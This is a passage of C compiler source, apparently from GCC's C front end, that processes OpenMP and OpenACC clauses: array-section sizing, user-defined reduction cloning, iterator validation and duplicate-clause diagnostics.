|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION))
continue;
if (length)
l = fold_convert (sizetype, length);
else
{
l = size_binop (PLUS_EXPR,
TYPE_MAX_VALUE (TYPE_DOMAIN (types[i])),
size_one_node);
l = size_binop (MINUS_EXPR, l,
fold_convert (sizetype, low_bound));
}
if (i > first_non_one)
{
l = fold_build2 (NE_EXPR, boolean_type_node, l,
size_zero_node);
if (condition == NULL_TREE)
condition = l;
else
condition = fold_build2 (BIT_AND_EXPR, boolean_type_node,
l, condition);
}
else if (size == NULL_TREE)
{
size = size_in_bytes (TREE_TYPE (types[i]));
tree eltype = TREE_TYPE (types[num - 1]);
while (TREE_CODE (eltype) == ARRAY_TYPE)
eltype = TREE_TYPE (eltype);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
if (integer_zerop (size)
|| integer_zerop (size_in_bytes (eltype)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero length array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return true;
}
size = size_binop (EXACT_DIV_EXPR, size,
size_in_bytes (eltype));
}
size = size_binop (MULT_EXPR, size, l);
if (condition)
size = fold_build3 (COND_EXPR, sizetype, condition,
size, size_zero_node);
}
else
size = size_binop (MULT_EXPR, size, l);
}
}
if (side_effects)
size = build2 (COMPOUND_EXPR, sizetype, side_effects, size);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
size = size_binop (MINUS_EXPR, size, size_one_node);
size = c_fully_fold (size, false, NULL);
size = save_expr (size);
tree index_type = build_index_type (size);
tree eltype = TREE_TYPE (first);
while (TREE_CODE (eltype) == ARRAY_TYPE)
eltype = TREE_TYPE (eltype);
tree type = build_array_type (eltype, index_type);
tree ptype = build_pointer_type (eltype);
if (TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE)
t = build_fold_addr_expr (t);
tree t2 = build_fold_addr_expr (first);
t2 = fold_convert_loc (OMP_CLAUSE_LOCATION (c),
ptrdiff_type_node, t2);
t2 = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
ptrdiff_type_node, t2,
fold_convert_loc (OMP_CLAUSE_LOCATION (c),
ptrdiff_type_node, t));
t2 = c_fully_fold (t2, false, NULL);
if (tree_fits_shwi_p (t2))
t = build2 (MEM_REF, type, t,
build_int_cst (ptype, tree_to_shwi (t2)));
else
{
t2 = fold_convert_loc (OMP_CLAUSE_LOCATION (c), sizetype, t2);
t = build2_loc (OMP_CLAUSE_LOCATION (c), POINTER_PLUS_EXPR,
TREE_TYPE (t), t, t2);
t = build2 (MEM_REF, type, t, build_int_cst (ptype, 0));
}
OMP_CLAUSE_DECL (c) = t;
return false;
}
first = c_fully_fold (first, false, NULL);
OMP_CLAUSE_DECL (c) = first;
if (size)
size = c_fully_fold (size, false, NULL);
OMP_CLAUSE_SIZE (c) = size;
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP
|| (TREE_CODE (t) == COMPONENT_REF
&& TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE))
return false;
gcc_assert (OMP_CLAUSE_MAP_KIND (c) != GOMP_MAP_FORCE_DEVICEPTR);
if (ort == C_ORT_OMP || ort == C_ORT_ACC)
switch (OMP_CLAUSE_MAP_KIND (c))
{
case GOMP_MAP_ALLOC:
case GOMP_MAP_IF_PRESENT:
case GOMP_MAP_TO:
case GOMP_MAP_FROM:
case GOMP_MAP_TOFROM:
case GOMP_MAP_ALWAYS_TO:
case GOMP_MAP_ALWAYS_FROM:
case GOMP_MAP_ALWAYS_TOFROM:
case GOMP_MAP_RELEASE:
case GOMP_MAP_DELETE:
case GOMP_MAP_FORCE_TO:
case GOMP_MAP_FORCE_FROM:
case GOMP_MAP_FORCE_TOFROM:
case GOMP_MAP_FORCE_PRESENT:
OMP_CLAUSE_MAP_MAYBE_ZERO_LENGTH_ARRAY_SECTION (c) = 1;
break;
default:
break;
}
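/* Chain a companion map clause for the base pointer itself; its
OMP_CLAUSE_SIZE is the byte offset of the section start from that
pointer, which the runtime uses to bias the pointer on the
device. */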
tree c2 = build_omp_clause (OMP_CLAUSE_LOCATION (c), OMP_CLAUSE_MAP);
if (ort != C_ORT_OMP && ort != C_ORT_ACC)
OMP_CLAUSE_SET_MAP_KIND (c2, GOMP_MAP_POINTER);
else if (TREE_CODE (t) == COMPONENT_REF)
{
gomp_map_kind k = (ort == C_ORT_ACC) ? GOMP_MAP_ATTACH_DETACH
: GOMP_MAP_ALWAYS_POINTER;
OMP_CLAUSE_SET_MAP_KIND (c2, k);
}
else
OMP_CLAUSE_SET_MAP_KIND (c2, GOMP_MAP_FIRSTPRIVATE_POINTER);
if (OMP_CLAUSE_MAP_KIND (c2) != GOMP_MAP_FIRSTPRIVATE_POINTER
&& !c_mark_addressable (t))
return false;
OMP_CLAUSE_DECL (c2) = t;
t = build_fold_addr_expr (first);
t = fold_convert_loc (OMP_CLAUSE_LOCATION (c), ptrdiff_type_node, t);
tree ptr = OMP_CLAUSE_DECL (c2);
if (!POINTER_TYPE_P (TREE_TYPE (ptr)))
ptr = build_fold_addr_expr (ptr);
t = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
ptrdiff_type_node, t,
fold_convert_loc (OMP_CLAUSE_LOCATION (c),
ptrdiff_type_node, ptr));
t = c_fully_fold (t, false, NULL);
OMP_CLAUSE_SIZE (c2) = t;
OMP_CLAUSE_CHAIN (c2) = OMP_CLAUSE_CHAIN (c);
OMP_CLAUSE_CHAIN (c) = c2;
}
return false;
}
/* Helper function of c_finish_omp_clauses. Clone STMT as if we were making
an inline call. But remap
the OMP_DECL1 VAR_DECL (omp_out resp. omp_orig) to PLACEHOLDER
and OMP_DECL2 VAR_DECL (omp_in resp. omp_priv) to DECL. */
static tree
c_clone_omp_udr (tree stmt, tree omp_decl1, tree omp_decl2,
tree decl, tree placeholder)
{
copy_body_data id;
hash_map<tree, tree> decl_map;
decl_map.put (omp_decl1, placeholder);
decl_map.put (omp_decl2, decl);
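/* Set up a minimal inlining context so that copy_tree_body_r
clones STMT, substituting both decls through decl_map as it
walks. */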
memset (&id, 0, sizeof (id));
id.src_fn = DECL_CONTEXT (omp_decl1);
id.dst_fn = current_function_decl;
id.src_cfun = DECL_STRUCT_FUNCTION (id.src_fn);
id.decl_map = &decl_map;
id.copy_decl = copy_decl_no_change;
id.transform_call_graph_edges = CB_CGE_DUPLICATE;
id.transform_new_cfg = true;
id.transform_return_to_modify = false;
id.transform_lang_insert_block = NULL;
id.eh_lp_nr = 0;
walk_tree (&stmt, copy_tree_body_r, &id, NULL);
return stmt;
}
/* Helper function of c_finish_omp_clauses, called via walk_tree.
Find OMP_CLAUSE_PLACEHOLDER (passed in DATA) in *TP. */
static tree
c_find_omp_placeholder_r (tree *tp, int *, void *data)
{
if (*tp == (tree) data)
return *tp;
return NULL_TREE;
}
/* Similarly, but also walk aggregate fields. */
struct c_find_omp_var_s { tree var; hash_set<tree> *pset; };
static tree
c_find_omp_var_r (tree *tp, int *, void *data)
{
if (*tp == ((struct c_find_omp_var_s *) data)->var)
return *tp;
if (RECORD_OR_UNION_TYPE_P (*tp))
{
tree field;
hash_set<tree> *pset = ((struct c_find_omp_var_s *) data)->pset;
for (field = TYPE_FIELDS (*tp); field;
field = DECL_CHAIN (field))
if (TREE_CODE (field) == FIELD_DECL)
{
tree ret = walk_tree (&DECL_FIELD_OFFSET (field),
c_find_omp_var_r, data, pset);
if (ret)
return ret;
ret = walk_tree (&DECL_SIZE (field), c_find_omp_var_r, data, pset);
if (ret)
return ret;
ret = walk_tree (&DECL_SIZE_UNIT (field), c_find_omp_var_r, data,
pset);
if (ret)
return ret;
ret = walk_tree (&TREE_TYPE (field), c_find_omp_var_r, data, pset);
if (ret)
return ret;
}
}
else if (INTEGRAL_TYPE_P (*tp))
return walk_tree (&TYPE_MAX_VALUE (*tp), c_find_omp_var_r, data,
((struct c_find_omp_var_s *) data)->pset);
return NULL_TREE;
}
/* Finish OpenMP iterators ITER. Return true if they are erroneous
and clauses containing them should be removed. */
static bool
c_omp_finish_iterators (tree iter)
{
bool ret = false;
for (tree it = iter; it; it = TREE_CHAIN (it))
{
tree var = TREE_VEC_ELT (it, 0);
tree begin = TREE_VEC_ELT (it, 1);
tree end = TREE_VEC_ELT (it, 2);
tree step = TREE_VEC_ELT (it, 3);
tree orig_step;
tree type = TREE_TYPE (var);
location_t loc = DECL_SOURCE_LOCATION (var);
if (type == error_mark_node)
{
ret = true;
continue;
}
if (!INTEGRAL_TYPE_P (type) && !POINTER_TYPE_P (type))
{
error_at (loc, "iterator %qD has neither integral nor pointer type",
var);
ret = true;
continue;
}
else if (TYPE_ATOMIC (type))
{
error_at (loc, "iterator %qD has %<_Atomic%> qualified type", var);
ret = true;
continue;
}
else if (TYPE_READONLY (type))
{
error_at (loc, "iterator %qD has const qualified type", var);
ret = true;
continue;
}
else if (step == error_mark_node
|| TREE_TYPE (step) == error_mark_node)
{
ret = true;
continue;
}
else if (!INTEGRAL_TYPE_P (TREE_TYPE (step)))
{
error_at (EXPR_LOC_OR_LOC (step, loc),
"iterator step with non-integral type");
ret = true;
continue;
}
begin = c_fully_fold (build_c_cast (loc, type, begin), false, NULL);
end = c_fully_fold (build_c_cast (loc, type, end), false, NULL);
orig_step = save_expr (c_fully_fold (step, false, NULL));
tree stype = POINTER_TYPE_P (type) ? sizetype : type;
step = c_fully_fold (build_c_cast (loc, stype, orig_step), false, NULL);
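/* For pointer iterators, scale the step by the pointee size:
compute (BEGIN + STEP) - BEGIN as a byte offset in ssizetype. */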
if (POINTER_TYPE_P (type))
{
begin = save_expr (begin);
step = pointer_int_sum (loc, PLUS_EXPR, begin, step);
step = fold_build2_loc (loc, MINUS_EXPR, sizetype,
fold_convert (sizetype, step),
fold_convert (sizetype, begin));
step = fold_convert (ssizetype, step);
}
if (integer_zerop (step))
{
error_at (loc, "iterator %qD has zero step", var);
ret = true;
continue;
}
if (begin == error_mark_node
|| end == error_mark_node
|| step == error_mark_node
|| orig_step == error_mark_node)
{
ret = true;
continue;
}
hash_set<tree> pset;
tree it2;
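/* Diagnose iterators later in the list whose type or
begin/end/step expressions refer to this iterator. */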
for (it2 = TREE_CHAIN (it); it2; it2 = TREE_CHAIN (it2))
{
tree var2 = TREE_VEC_ELT (it2, 0);
tree begin2 = TREE_VEC_ELT (it2, 1);
tree end2 = TREE_VEC_ELT (it2, 2);
tree step2 = TREE_VEC_ELT (it2, 3);
tree type2 = TREE_TYPE (var2);
location_t loc2 = DECL_SOURCE_LOCATION (var2);
struct c_find_omp_var_s data = { var, &pset };
if (walk_tree (&type2, c_find_omp_var_r, &data, &pset))
{
error_at (loc2,
"type of iterator %qD refers to outer iterator %qD",
var2, var);
break;
}
else if (walk_tree (&begin2, c_find_omp_var_r, &data, &pset))
{
error_at (EXPR_LOC_OR_LOC (begin2, loc2),
"begin expression refers to outer iterator %qD", var);
break;
}
else if (walk_tree (&end2, c_find_omp_var_r, &data, &pset))
{
error_at (EXPR_LOC_OR_LOC (end2, loc2),
"end expression refers to outer iterator %qD", var);
break;
}
else if (walk_tree (&step2, c_find_omp_var_r, &data, &pset))
{
error_at (EXPR_LOC_OR_LOC (step2, loc2),
"step expression refers to outer iterator %qD", var);
break;
}
}
if (it2)
{
ret = true;
continue;
}
TREE_VEC_ELT (it, 1) = begin;
TREE_VEC_ELT (it, 2) = end;
TREE_VEC_ELT (it, 3) = step;
TREE_VEC_ELT (it, 4) = orig_step;
}
return ret;
}
/* Ensure that pointers are used in OpenACC attach and detach clauses.
Return true if an error has been detected. */
static bool
c_oacc_check_attachments (tree c)
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP)
return false;
/* OpenACC attach / detach clauses must be pointers. */
if (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH)
{
tree t = OMP_CLAUSE_DECL (c);
while (TREE_CODE (t) == TREE_LIST)
t = TREE_CHAIN (t);
if (TREE_CODE (TREE_TYPE (t)) != POINTER_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c), "expected pointer in %qs clause",
c_omp_map_clause_name (c, true));
return true;
}
}
return false;
}
/* For all elements of CLAUSES, validate them against their constraints.
Remove any elements from the list that are invalid. */
tree
c_finish_omp_clauses (tree clauses, enum c_omp_region_type ort)
{
bitmap_head generic_head, firstprivate_head, lastprivate_head;
bitmap_head aligned_head, map_head, map_field_head, oacc_reduction_head;
tree c, t, type, *pc;
tree simdlen = NULL_TREE, safelen = NULL_TREE;
bool branch_seen = false;
bool copyprivate_seen = false;
bool linear_variable_step_check = false;
tree *nowait_clause = NULL;
tree ordered_clause = NULL_TREE;
tree schedule_clause = NULL_TREE;
bool oacc_async = false;
tree last_iterators = NULL_TREE;
bool last_iterators_remove = false;
tree *nogroup_seen = NULL;
tree *order_clause = NULL;
/* 1 if normal/task reduction has been seen, -1 if inscan reduction
has been seen, -2 if mixed inscan/normal reduction diagnosed. */
int reduction_seen = 0;
bitmap_obstack_initialize (NULL);
bitmap_initialize (&generic_head, &bitmap_default_obstack);
bitmap_initialize (&firstprivate_head, &bitmap_default_obstack);
bitmap_initialize (&lastprivate_head, &bitmap_default_obstack);
bitmap_initialize (&aligned_head, &bitmap_default_obstack);
/* If ort == C_ORT_OMP_DECLARE_SIMD, map_head is used as uniform_head
instead. */
bitmap_initialize (&map_head, &bitmap_default_obstack);
bitmap_initialize (&map_field_head, &bitmap_default_obstack);
/* If ort == C_ORT_OMP, oacc_reduction_head is used as nontemporal_head
or use_device_xxx_head instead. */
bitmap_initialize (&oacc_reduction_head, &bitmap_default_obstack);
if (ort & C_ORT_ACC)
for (c = clauses; c; c = OMP_CLAUSE_CHAIN (c))
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_ASYNC)
{
oacc_async = true;
break;
}
for (pc = &clauses, c = clauses; c ; c = *pc)
{
bool remove = false;
bool need_complete = false;
bool need_implicitly_determined = false;
switch (OMP_CLAUSE_CODE (c))
{
case OMP_CLAUSE_SHARED:
need_implicitly_determined = true;
goto check_dup_generic;
case OMP_CLAUSE_PRIVATE:
need_complete = true;
need_implicitly_determined = true;
goto check_dup_generic;
case OMP_CLAUSE_REDUCTION:
if (reduction_seen == 0)
reduction_seen = OMP_CLAUSE_REDUCTION_INSCAN (c) ? -1 : 1;
else if (reduction_seen != -2
&& reduction_seen != (OMP_CLAUSE_REDUCTION_INSCAN (c)
? -1 : 1))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<inscan%> and non-%<inscan%> %<reduction%> clauses "
"on the same construct");
reduction_seen = -2;
}
/* FALLTHRU */
case OMP_CLAUSE_IN_REDUCTION:
case OMP_CLAUSE_TASK_REDUCTION:
need_implicitly_determined = true;
t = OMP_CLAUSE_DECL (c);
if (TREE_CODE (t) == TREE_LIST)
{
if (handle_omp_array_sections (c, ort))
{
remove = true;
break;
}
t = OMP_CLAUSE_DECL (c);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
&& OMP_CLAUSE_REDUCTION_INSCAN (c))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<inscan%> %<reduction%> clause with array "
"section");
remove = true;
break;
}
}
t = require_complete_type (OMP_CLAUSE_LOCATION (c), t);
if (t == error_mark_node)
{
remove = true;
break;
}
if (oacc_async)
c_mark_addressable (t);
type = TREE_TYPE (t);
if (TREE_CODE (t) == MEM_REF)
type = TREE_TYPE (type);
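/* An array reduction is rewritten as a MEM_REF spanning the whole
array, built from a flat array type with one element per array
member. */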
if (TREE_CODE (type) == ARRAY_TYPE)
{
tree oatype = type;
gcc_assert (TREE_CODE (t) != MEM_REF);
while (TREE_CODE (type) == ARRAY_TYPE)
type = TREE_TYPE (type);
if (integer_zerop (TYPE_SIZE_UNIT (type)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD in %<reduction%> clause is a zero size array",
t);
remove = true;
break;
}
tree size = size_binop (EXACT_DIV_EXPR, TYPE_SIZE_UNIT (oatype),
TYPE_SIZE_UNIT (type));
if (integer_zerop (size))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD in %<reduction%> clause is a zero size array",
t);
remove = true;
break;
}
size = size_binop (MINUS_EXPR, size, size_one_node);
size = save_expr (size);
tree index_type = build_index_type (size);
tree atype = build_array_type (type, index_type);
tree ptype = build_pointer_type (type);
if (TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE)
t = build_fold_addr_expr (t);
t = build2 (MEM_REF, atype, t, build_int_cst (ptype, 0));
OMP_CLAUSE_DECL (c) = t;
}
if (TYPE_ATOMIC (type))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qE in %<reduction%> clause", t);
remove = true;
break;
}
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_REDUCTION_TASK (c))
{
/* Disallow zero sized or potentially zero sized task
reductions. */
if (integer_zerop (TYPE_SIZE_UNIT (type)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero sized type %qT in %qs clause", type,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
break;
}
else if (TREE_CODE (TYPE_SIZE_UNIT (type)) != INTEGER_CST)
{
error_at (OMP_CLAUSE_LOCATION (c),
"variable sized type %qT in %qs clause", type,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
break;
}
}
if (OMP_CLAUSE_REDUCTION_PLACEHOLDER (c) == NULL_TREE
&& (FLOAT_TYPE_P (type)
|| TREE_CODE (type) == COMPLEX_TYPE))
{
enum tree_code r_code = OMP_CLAUSE_REDUCTION_CODE (c);
const char *r_name = NULL;
switch (r_code)
{
case PLUS_EXPR:
case MULT_EXPR:
case MINUS_EXPR:
break;
case MIN_EXPR:
if (TREE_CODE (type) == COMPLEX_TYPE)
r_name = "min";
break;
case MAX_EXPR:
if (TREE_CODE (type) == COMPLEX_TYPE)
r_name = "max";
break;
case BIT_AND_EXPR:
r_name = "&";
break;
case BIT_XOR_EXPR:
r_name = "^";
break;
case BIT_IOR_EXPR:
r_name = "|";
break;
case TRUTH_ANDIF_EXPR:
if (FLOAT_TYPE_P (type))
r_name = "&&";
break;
case TRUTH_ORIF_EXPR:
if (FLOAT_TYPE_P (type))
r_name = "||";
break;
default:
gcc_unreachable ();
}
if (r_name)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE has invalid type for %<reduction(%s)%>",
t, r_name);
remove = true;
break;
}
}
else if (OMP_CLAUSE_REDUCTION_PLACEHOLDER (c) == error_mark_node)
{
error_at (OMP_CLAUSE_LOCATION (c),
"user defined reduction not found for %qE", t);
remove = true;
break;
}
else if (OMP_CLAUSE_REDUCTION_PLACEHOLDER (c))
{
tree list = OMP_CLAUSE_REDUCTION_PLACEHOLDER (c);
type = TYPE_MAIN_VARIANT (type);
tree placeholder = build_decl (OMP_CLAUSE_LOCATION (c),
VAR_DECL, NULL_TREE, type);
tree decl_placeholder = NULL_TREE;
OMP_CLAUSE_REDUCTION_PLACEHOLDER (c) = placeholder;
DECL_ARTIFICIAL (placeholder) = 1;
DECL_IGNORED_P (placeholder) = 1;
if (TREE_CODE (t) == MEM_REF)
{
decl_placeholder = build_decl (OMP_CLAUSE_LOCATION (c),
VAR_DECL, NULL_TREE, type);
OMP_CLAUSE_REDUCTION_DECL_PLACEHOLDER (c) = decl_placeholder;
DECL_ARTIFICIAL (decl_placeholder) = 1;
DECL_IGNORED_P (decl_placeholder) = 1;
}
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 0)))
c_mark_addressable (placeholder);
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 1)))
c_mark_addressable (decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c));
OMP_CLAUSE_REDUCTION_MERGE (c)
= c_clone_omp_udr (TREE_VEC_ELT (list, 2),
TREE_VEC_ELT (list, 0),
TREE_VEC_ELT (list, 1),
decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c), placeholder);
OMP_CLAUSE_REDUCTION_MERGE (c)
= build3_loc (OMP_CLAUSE_LOCATION (c), BIND_EXPR,
void_type_node, NULL_TREE,
OMP_CLAUSE_REDUCTION_MERGE (c), NULL_TREE);
TREE_SIDE_EFFECTS (OMP_CLAUSE_REDUCTION_MERGE (c)) = 1;
if (TREE_VEC_LENGTH (list) == 6)
{
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 3)))
c_mark_addressable (decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c));
if (TREE_ADDRESSABLE (TREE_VEC_ELT (list, 4)))
c_mark_addressable (placeholder);
tree init = TREE_VEC_ELT (list, 5);
if (init == error_mark_node)
init = DECL_INITIAL (TREE_VEC_ELT (list, 3));
OMP_CLAUSE_REDUCTION_INIT (c)
= c_clone_omp_udr (init, TREE_VEC_ELT (list, 4),
TREE_VEC_ELT (list, 3),
decl_placeholder ? decl_placeholder
: OMP_CLAUSE_DECL (c), placeholder);
if (TREE_VEC_ELT (list, 5) == error_mark_node)
{
tree v = decl_placeholder ? decl_placeholder : t;
OMP_CLAUSE_REDUCTION_INIT (c)
= build2 (INIT_EXPR, TREE_TYPE (v), v,
OMP_CLAUSE_REDUCTION_INIT (c));
}
if (walk_tree (&OMP_CLAUSE_REDUCTION_INIT (c),
c_find_omp_placeholder_r,
placeholder, NULL))
OMP_CLAUSE_REDUCTION_OMP_ORIG_REF (c) = 1;
}
else
{
tree init;
tree v = decl_placeholder ? decl_placeholder : t;
if (AGGREGATE_TYPE_P (TREE_TYPE (v)))
init = build_constructor (TREE_TYPE (v), NULL);
else
init = fold_convert (TREE_TYPE (v), integer_zero_node);
OMP_CLAUSE_REDUCTION_INIT (c)
= build2 (INIT_EXPR, TREE_TYPE (v), v, init);
}
OMP_CLAUSE_REDUCTION_INIT (c)
= build3_loc (OMP_CLAUSE_LOCATION (c), BIND_EXPR,
void_type_node, NULL_TREE,
OMP_CLAUSE_REDUCTION_INIT (c), NULL_TREE);
TREE_SIDE_EFFECTS (OMP_CLAUSE_REDUCTION_INIT (c)) = 1;
}
if (TREE_CODE (t) == MEM_REF)
{
if (TYPE_SIZE_UNIT (TREE_TYPE (TREE_TYPE (t))) == NULL_TREE
|| TREE_CODE (TYPE_SIZE_UNIT (TREE_TYPE (TREE_TYPE (t))))
!= INTEGER_CST)
{
sorry ("variable length element type in array "
"%<reduction%> clause");
remove = true;
break;
}
t = TREE_OPERAND (t, 0);
if (TREE_CODE (t) == POINTER_PLUS_EXPR)
t = TREE_OPERAND (t, 0);
if (TREE_CODE (t) == ADDR_EXPR)
t = TREE_OPERAND (t, 0);
}
goto check_dup_generic_t;
case OMP_CLAUSE_COPYPRIVATE:
copyprivate_seen = true;
if (nowait_clause)
{
error_at (OMP_CLAUSE_LOCATION (*nowait_clause),
"%<nowait%> clause must not be used together "
"with %<copyprivate%>");
*nowait_clause = OMP_CLAUSE_CHAIN (*nowait_clause);
nowait_clause = NULL;
}
goto check_dup_generic;
case OMP_CLAUSE_COPYIN:
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) || !DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE must be %<threadprivate%> for %<copyin%>", t);
remove = true;
break;
}
goto check_dup_generic;
case OMP_CLAUSE_LINEAR:
if (ort != C_ORT_OMP_DECLARE_SIMD)
need_implicitly_determined = true;
t = OMP_CLAUSE_DECL (c);
if (ort != C_ORT_OMP_DECLARE_SIMD
&& OMP_CLAUSE_LINEAR_KIND (c) != OMP_CLAUSE_LINEAR_DEFAULT)
{
error_at (OMP_CLAUSE_LOCATION (c),
"modifier should not be specified in %<linear%> "
"clause on %<simd%> or %<for%> constructs");
OMP_CLAUSE_LINEAR_KIND (c) = OMP_CLAUSE_LINEAR_DEFAULT;
}
if (!INTEGRAL_TYPE_P (TREE_TYPE (t))
&& TREE_CODE (TREE_TYPE (t)) != POINTER_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"linear clause applied to non-integral non-pointer "
"variable with type %qT", TREE_TYPE (t));
remove = true;
break;
}
if (TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<_Atomic%> %qD in %<linear%> clause", t);
remove = true;
break;
}
if (ort == C_ORT_OMP_DECLARE_SIMD)
{
tree s = OMP_CLAUSE_LINEAR_STEP (c);
if (TREE_CODE (s) == PARM_DECL)
{
OMP_CLAUSE_LINEAR_VARIABLE_STRIDE (c) = 1;
/* map_head bitmap is used as uniform_head if
declare_simd. */
if (!bitmap_bit_p (&map_head, DECL_UID (s)))
linear_variable_step_check = true;
goto check_dup_generic;
}
if (TREE_CODE (s) != INTEGER_CST)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<linear%> clause step %qE is neither constant "
"nor a parameter", s);
remove = true;
break;
}
}
if (TREE_CODE (TREE_TYPE (OMP_CLAUSE_DECL (c))) == POINTER_TYPE)
{
tree s = OMP_CLAUSE_LINEAR_STEP (c);
s = pointer_int_sum (OMP_CLAUSE_LOCATION (c), PLUS_EXPR,
OMP_CLAUSE_DECL (c), s);
s = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
sizetype, fold_convert (sizetype, s),
fold_convert
(sizetype, OMP_CLAUSE_DECL (c)));
if (s == error_mark_node)
s = size_one_node;
OMP_CLAUSE_LINEAR_STEP (c) = s;
}
else
OMP_CLAUSE_LINEAR_STEP (c)
= fold_convert (TREE_TYPE (t), OMP_CLAUSE_LINEAR_STEP (c));
goto check_dup_generic;
check_dup_generic:
t = OMP_CLAUSE_DECL (c);
check_dup_generic_t:
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if ((ort == C_ORT_ACC
&& OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION)
|| (ort == C_ORT_OMP
&& (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_USE_DEVICE_PTR
|| (OMP_CLAUSE_CODE (c)
== OMP_CLAUSE_USE_DEVICE_ADDR))))
{
if (bitmap_bit_p (&oacc_reduction_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
ort == C_ORT_ACC
? "%qD appears more than once in reduction clauses"
: "%qD appears more than once in data clauses",
t);
remove = true;
}
else
bitmap_set_bit (&oacc_reduction_head, DECL_UID (t));
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t))
|| bitmap_bit_p (&lastprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in data clauses", t);
remove = true;
}
else if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_PRIVATE
&& bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
bitmap_set_bit (&generic_head, DECL_UID (t));
break;
case OMP_CLAUSE_FIRSTPRIVATE:
t = OMP_CLAUSE_DECL (c);
need_complete = true;
need_implicitly_determined = true;
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %<firstprivate%>", t);
remove = true;
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&firstprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in data clauses", t);
remove = true;
}
else if (bitmap_bit_p (&map_head, DECL_UID (t)))
{
if (ort == C_ORT_ACC)
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears more than once in data clauses", t);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qD appears both in data and map clauses", t);
remove = true;
}
else
bitmap_set_bit (&firstprivate_head, DECL_UID (t));
break;
case OMP_CLAUSE_LASTPRIVATE:
t = OMP_CLAUSE_DECL (c);
need_complete = true;
need_implicitly_determined = true;
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %<lastprivate%>", t);
remove = true;
}
else if (bitmap_bit_p (&generic_head, DECL_UID (t))
|| bitmap_bit_p (&lastprivate_head, DECL_UID (t)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE appears more than once in data clauses", t);
remove = true;
}
else
bitmap_set_bit (&lastprivate_head, DECL_UID (t));
break;
case OMP_CLAUSE_ALIGNED:
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %<aligned%> clause", t);
remove = true;
}
else if (!POINTER_TYPE_P (TREE_TYPE (t))
&& TREE_CODE (TREE_TYPE (t)) != ARRAY_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE in %<aligned%> clause is neither a pointer nor "
"an array", t);
remove = true;
}
